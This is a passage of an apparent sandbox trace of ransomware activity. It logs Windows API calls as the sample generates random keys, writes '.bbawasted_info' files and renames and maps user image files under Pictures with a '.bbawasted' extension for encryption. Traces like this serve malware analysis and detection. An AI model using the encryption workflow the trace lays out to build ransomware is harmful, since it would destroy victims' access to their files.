HALPmcxz\\Pictures\\PwBncZJNNFXo\\62UB-DXQ3.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\62ub-dxq3.bmp.bbawasted")) returned 1 [0075.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\62UB-DXQ3.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\62ub-dxq3.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.202] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.204] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0075.204] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5bf0b8 | out: pbBuffer=0x5bf0b8) returned 1 [0075.204] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.204] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0075.205] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0075.205] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.214] SetEndOfFile (hFile=0x120) returned 1 [0075.216] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.216] CloseHandle (hObject=0x120) returned 1 [0075.218] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c48 | out: hHeap=0x580000) returned 1 [0075.218] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0075.218] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0075.218] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.218] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\CP0fg21R8yIH.gif") returned 72 [0075.218] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29a) returned 0x5d2c48 [0075.219] lstrcpyW (in: lpString1=0x5d2cd8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.219] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.219] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0075.219] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.219] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\CP0fg21R8yIH.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\cp0fg21r8yih.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.220] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0075.221] SetEndOfFile (hFile=0x120) returned 1 [0075.221] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.221] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.221] lstrcpyW (in: lpString1=0x5d2cd8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\CP0fg21R8yIH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\cp0fg21r8yih.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\CP0fg21R8yIH.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\cp0fg21r8yih.gif.bbawasted")) returned 1 [0075.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\CP0fg21R8yIH.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\cp0fg21r8yih.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0075.222] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0075.224] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0075.225] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5bf0b8 | out: pbBuffer=0x5bf0b8) returned 1 [0075.225] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.225] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0075.273] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0075.273] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.282] SetEndOfFile (hFile=0x120) returned 1 [0075.284] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.284] CloseHandle (hObject=0x120) returned 1 [0075.286] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c48 | out: hHeap=0x580000) returned 1 [0075.286] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0075.287] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0075.287] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\KwAkXLk5.png") returned 68 [0075.287] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5d2c30 [0075.287] lstrcpyW (in: lpString1=0x5d2cb8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.287] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.287] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0075.288] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.288] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\KwAkXLk5.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\kwakxlk5.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.289] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0075.290] SetEndOfFile (hFile=0x120) returned 1 [0075.290] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.290] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.290] lstrcpyW (in: lpString1=0x5d2cb8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\KwAkXLk5.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\kwakxlk5.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\KwAkXLk5.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\kwakxlk5.png.bbawasted")) returned 1 [0075.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\KwAkXLk5.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\kwakxlk5.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.291] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.293] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0075.294] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5bf0b8 | out: pbBuffer=0x5bf0b8) returned 1 [0075.294] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.294] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0075.295] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0075.295] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.303] SetEndOfFile (hFile=0x120) returned 1 [0075.305] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.305] CloseHandle (hObject=0x120) returned 1 [0075.307] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c30 | out: hHeap=0x580000) returned 1 [0075.307] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0075.308] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0075.308] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.308] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\_-9Vi.bmp") returned 65 [0075.308] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5d2c30 [0075.308] lstrcpyW (in: lpString1=0x5d2cb2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.308] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.308] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0075.309] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.309] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\_-9Vi.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\_-9vi.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.309] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0075.310] SetEndOfFile (hFile=0x120) returned 1 [0075.311] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.311] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.311] lstrcpyW (in: lpString1=0x5d2cb2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\_-9Vi.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\_-9vi.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\_-9Vi.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\_-9vi.bmp.bbawasted")) returned 1 [0075.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\_-9Vi.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\_-9vi.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0075.311] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0075.314] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0075.315] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5bf0b8 | out: pbBuffer=0x5bf0b8) returned 1 [0075.315] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.315] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0075.316] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0075.316] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.419] SetEndOfFile (hFile=0x120) returned 1 [0075.421] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0075.421] CloseHandle (hObject=0x120) returned 1 [0075.422] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c30 | out: hHeap=0x580000) returned 1 [0075.422] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0075.423] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0075.423] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\d_J87Z98PiV5L1G.jpg") returned 67 [0075.423] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x290) returned 0x5d2c30 [0075.423] lstrcpyW (in: lpString1=0x5d2cb6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.423] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0075.423] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0075.424] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0075.424] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\d_J87Z98PiV5L1G.jpg.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\d_j87z98piv5l1g.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.425] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0075.426] SetEndOfFile (hFile=0x120) returned 1 [0075.426] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.426] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0075.426] lstrcpyW (in: lpString1=0x5d2cb6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\d_J87Z98PiV5L1G.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\d_j87z98piv5l1g.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\d_J87Z98PiV5L1G.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\d_j87z98piv5l1g.jpg.bbawasted")) returned 1 [0075.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\d_J87Z98PiV5L1G.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\d_j87z98piv5l1g.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.427] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.430] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0075.431] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.431] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.431] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0075.432] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0075.432] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.440] SetEndOfFile (hFile=0x120) returned 1 [0075.442] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0075.442] CloseHandle (hObject=0x120) returned 1 [0076.224] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c30 | out: hHeap=0x580000) returned 1 [0076.224] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0076.225] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.225] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.225] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\BWpjcV.bmp") returned 76 [0076.225] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5d2990 [0076.225] lstrcpyW (in: lpString1=0x5d2a28, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.225] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.225] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) returned 1 [0076.226] CryptGenRandom (in: hProv=0x5d0908, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.226] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\BWpjcV.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\bwpjcv.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.226] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0076.227] SetEndOfFile (hFile=0x120) returned 1 [0076.227] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.227] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.227] lstrcpyW (in: lpString1=0x5d2a28, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\BWpjcV.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\bwpjcv.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\BWpjcV.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\bwpjcv.bmp.bbawasted")) returned 1 [0076.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\BWpjcV.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\bwpjcv.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.228] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.231] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0076.232] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d2c88 | out: pbBuffer=0x5d2c88) returned 1 [0076.232] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.232] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0076.232] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0076.232] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.241] SetEndOfFile (hFile=0x120) returned 1 [0076.243] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.243] CloseHandle (hObject=0x120) returned 1 [0076.244] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.244] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5d0908) returned 1 [0076.245] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0076.245] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\giMhZdZNY33v4lS3ehu.jpg") returned 89 [0076.245] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2bc) returned 0x5d2990 [0076.245] lstrcpyW (in: lpString1=0x5d2a42, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.245] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.245] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5d0908) 